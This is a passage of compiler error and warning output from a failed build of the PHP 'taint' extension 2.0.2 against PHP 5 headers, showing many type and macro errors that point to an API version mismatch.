#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:739:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(result));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_concat_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:756:9: warning: assignment makes pointer from integer without a cast [enabled by default]
result = EX_VAR(opline->result.var);
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:766:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(result));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_helper':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:807:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(var_ptr));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_obj_helper':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:834:55: warning: comparison between pointer and integer [enabled by default]
if (opline->op1_type == IS_UNUSED && Z_OBJ_P(object) == NULL) {
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_operators.h:486:33: error: invalid type argument of unary '' (have 'int')
#define Z_TYPE_P(zval_p) Z_TYPE(*zval_p)
^
/usr/include/php5/Zend/zend_operators.h:485:24: note: in definition of macro 'Z_TYPE'
#define Z_TYPE(zval) (zval).type
^
/usr/include/php5/Zend/zend_API.h:559:3: note: in expansion of macro 'Z_TYPE_P'
Z_TYPE_P(z) = IS_NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:848:6: note: in expansion of macro 'ZVAL_NULL'
ZVAL_NULL(EX_VAR(opline->result.var));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:857:17: warning: assignment from incompatible pointer type [enabled by default]
&& (var_ptr = Z_OBJ_HT_P(object)->get_property_ptr_ptr(object, property, BP_VAR_RW, NULL)) != NULL) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:873:5: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(var_ptr));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:876:4: warning: passing argument 6 of 'php_taint_assign_op_overloaded_property' makes pointer from integer without a cast [enabled by default]
php_taint_assign_op_overloaded_property(object, property, NULL, value, binary_op, EX_VAR(opline->result.var));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:407:13: note: expected 'struct zval *' but argument is of type 'int'
static void php_taint_assign_op_overloaded_property(zval *object, zval *property, void **cache_slot, zval *value, binary_op_type binary_op, zval result) / {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_dim_helper':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:905:58: warning: comparison between pointer and integer [enabled by default]
if (opline->op1_type == IS_UNUSED && Z_OBJ_P(container) == NULL) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:917:4: warning: passing argument 4 of 'php_taint_binary_assign_op_obj_dim' makes pointer from integer without a cast [enabled by default]
php_taint_binary_assign_op_obj_dim(container, dim, value, EX_VAR(opline->result.var), binary_op);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:457:13: note: expected 'struct zval *' but argument is of type 'int'
static void php_taint_binary_assign_op_obj_dim(zval *object, zval *property, zval *value, zval retval, binary_op_type binary_op) / {{{ / {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:928:11: warning: assignment makes pointer from integer without a cast [enabled by default]
var_ptr = Z_INDIRECT(rv);
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_operators.h:486:33: error: invalid type argument of unary '' (have 'int')
#define Z_TYPE_P(zval_p) Z_TYPE(*zval_p)
^
/usr/include/php5/Zend/zend_operators.h:485:24: note: in definition of macro 'Z_TYPE'
#define Z_TYPE(zval) (zval).type
^
/usr/include/php5/Zend/zend_API.h:559:3: note: in expansion of macro 'Z_TYPE_P'
Z_TYPE_P(z) = IS_NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:947:5: note: in expansion of macro 'ZVAL_NULL'
ZVAL_NULL(EX_VAR(opline->result.var));
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:966:5: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(var_ptr));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fcall_check':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1007:24: warning: initialization makes pointer from integer without a cast [enabled by default]
const char *fname = ZSTR_VAL(fbc->common.function_name);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1010:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1018:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1026:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1036:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1044:15: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1053:6: error: unknown type name 'uint32_t'
uint32_t i;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1055:17: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *p = ZEND_CALL_ARG(ex, i + 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1067:6: error: unknown type name 'zend_string'
zend_string *key;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1068:6: error: unknown type name 'zend_long'
zend_long idx;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1069:22: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *val, *p = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1074:62: error: expected ';' before '{' token
ZEND_HASH_FOREACH_KEY_VAL(Z_ARRVAL_P(p), idx, key, val) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1093:9: warning: assignment makes pointer from integer without a cast [enabled by default]
fp = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1094:10: warning: assignment makes pointer from integer without a cast [enabled by default]
str = ZEND_CALL_ARG(ex, 2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1111:20: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *header = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1120:17: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *str = ZEND_CALL_ARG(ex, 1);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1132:19: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *query = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1141:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, 2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1151:23: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *callback = ZEND_CALL_ARG(ex, 2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1157:7: error: too few arguments to function 'zend_hash_index_find'
zval *cname = zend_hash_index_find(Z_ARRVAL_P(callback), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1158:7: error: too few arguments to function 'zend_hash_index_find'
zval *mname = zend_hash_index_find(Z_ARRVAL_P(callback), 0);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1176:17: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *cmd = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1187:29: warning: initialization makes pointer from integer without a cast [enabled by default]
const char *class_name = ZSTR_VAL(fbc->common.scope->name);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1189:24: warning: initialization makes pointer from integer without a cast [enabled by default]
const char *fname = ZSTR_VAL(fbc->common.function_name);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1194:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1206:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1218:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1230:18: warning: initialization makes pointer from integer without a cast [enabled by default]
zval *sql = ZEND_CALL_ARG(ex, arg_count);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fcall_handler':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1245:28: warning: initialization from incompatible pointer type [enabled by default]
zend_execute_data *call = execute_data->call;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1246:27: error: 'zend_execute_data' has no member named 'func'
zend_function *fbc = call->func;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_register_handlers':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1258:31: error: 'ZEND_INIT_USER_CALL' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_INIT_USER_CALL, php_taint_init_dynamic_fcall_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1259:31: error: 'ZEND_INIT_DYNAMIC_CALL' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_INIT_DYNAMIC_CALL, php_taint_init_dynamic_fcall_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1262:31: error: 'ZEND_FAST_CONCAT' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_FAST_CONCAT, php_taint_concat_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1264:31: error: 'ZEND_ROPE_END' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_ROPE_END, php_taint_rope_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1266:31: error: 'ZEND_DO_ICALL' undeclared (first use in this function)
zend_set_user_opcode_handler(ZEND_DO_ICALL, php_taint_fcall_handler);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_override_func':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1272:12: warning: assignment makes pointer from integer without a cast [enabled by default]
if ((func = zend_hash_str_find_ptr(CG(function_table), name, strlen(name))) != NULL) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strval':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1345:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_sprintf':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1370:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_vsprintf':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1379:2: error: unknown type name 'zend_string'
zend_string *format;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1393:48: error: expected ';' before '{' token
ZEND_HASH_FOREACH_VAL(Z_ARRVAL_P(args), val) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1405:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_explode':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1413:2: error: unknown type name 'zend_string'
zend_string *str, *delim;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1414:2: error: unknown type name 'zend_long'
zend_long limit = ZEND_LONG_MAX;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1414:20: error: 'ZEND_LONG_MAX' undeclared (first use in this function)
zend_long limit = ZEND_LONG_MAX;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_implode':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1452:50: error: expected ';' before '{' token
ZEND_HASH_FOREACH_VAL(Z_ARRVAL_P(target), val) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1464:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_trim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1473:2: error: unknown type name 'zend_string'
zend_string *str, *what;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1487:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1488:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_rtrim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1497:2: error: unknown type name 'zend_string'
zend_string *str, *what;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1511:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1512:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_ltrim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1521:2: error: unknown type name 'zend_string'
zend_string *str, *what;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1535:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1536:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_str_replace':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1561:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_str_pad':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1570:2: error: unknown type name 'zend_string'
zend_string *input;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1571:2: error: unknown type name 'zend_long'
zend_long pad_length;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1572:2: error: unknown type name 'zend_string'
zend_string *pad_str = NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1573:2: error: unknown type name 'zend_long'
zend_long pad_type_val = 1;
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1589:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strstr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1599:2: error: unknown type name 'zend_string'
zend_string *haystack;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1614:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != haystack && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1615:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_substr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1624:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1625:2: error: unknown type name 'zend_long'
zend_long l = 0, f;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1639:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1640:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strtolower':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1649:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1663:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1664:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_strtoupper':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1673:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1687:26: warning: comparison between pointer and integer [enabled by default]
Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1688:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_dirname':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1696:2: error: unknown type name 'zend_string'
zend_string *str;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1697:2: error: unknown type name 'zend_long'
zend_long levels = 1;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1711:29: warning: comparison between pointer and integer [enabled by default]
&& Z_STR_P(return_value) != str && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1712:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_basename':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1720:2: error: unknown type name 'zend_string'
zend_string *string, *suffix = NULL;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1734:29: warning: comparison between pointer and integer [enabled by default]
&& Z_STR_P(return_value) != string && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1735:3: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint_pathinfo':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1743:2: error: unknown type name 'zend_string'
zend_string *path;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1744:2: error: unknown type name 'zend_long'
zend_long opt;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1759:30: warning: comparison between pointer and integer [enabled by default]
if (Z_STR_P(return_value) != path && Z_STRLEN_P(return_value)) {
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1760:5: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(return_value));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'OnUpdateErrorLevel':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1773:3: warning: passing argument 1 of 'atoi' makes pointer from integer without a cast [enabled by default]
TAINT_G(error_level) = (int)atoi(ZSTR_VAL(new_value));
^
In file included from /usr/include/features.h:374:0,
from /usr/include/stdlib.h:24,
from /usr/include/php5/main/php_config.h:2418,
from /usr/include/php5/main/php.h:33,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/stdlib.h:278:1: note: expected 'const char *' but argument is of type 'int'
__NTH (atoi (const char *__nptr))
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_taint':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1807:4: error: unknown type name 'zend_string'
zend_string *str = zend_string_init(Z_STRVAL_P(el), Z_STRLEN_P(el), 0);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1807:23: warning: initialization makes pointer from integer without a cast [enabled by default]
zend_string *str = zend_string_init(Z_STRVAL_P(el), Z_STRLEN_P(el), 0);
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1809:4: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(str);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zif_untaint':
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:44:45: error: lvalue required as left operand of assignment
#define TAINT_CLEAN(str) (GC_FLAGS((str)) &= ~IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1838:4: note: in expansion of macro 'TAINT_CLEAN'
TAINT_CLEAN(Z_STR_P(el));
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'zm_activate_taint':
/usr/include/php5/Zend/zend_operators.h:485:29: error: request for member 'type' in something not a structure or union
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1903:6: note: in expansion of macro 'Z_TYPE'
if (Z_TYPE(PG(http_globals)[TRACK_VARS_POST]) == IS_ARRAY) {
^
/usr/include/php5/Zend/zend_operators.h:445:32: error: request for member 'value' in something not a structure or union
#define Z_ARRVAL(zval) (zval).value.ht
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1904:26: note: in expansion of macro 'Z_ARRVAL'
php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_POST]));
^
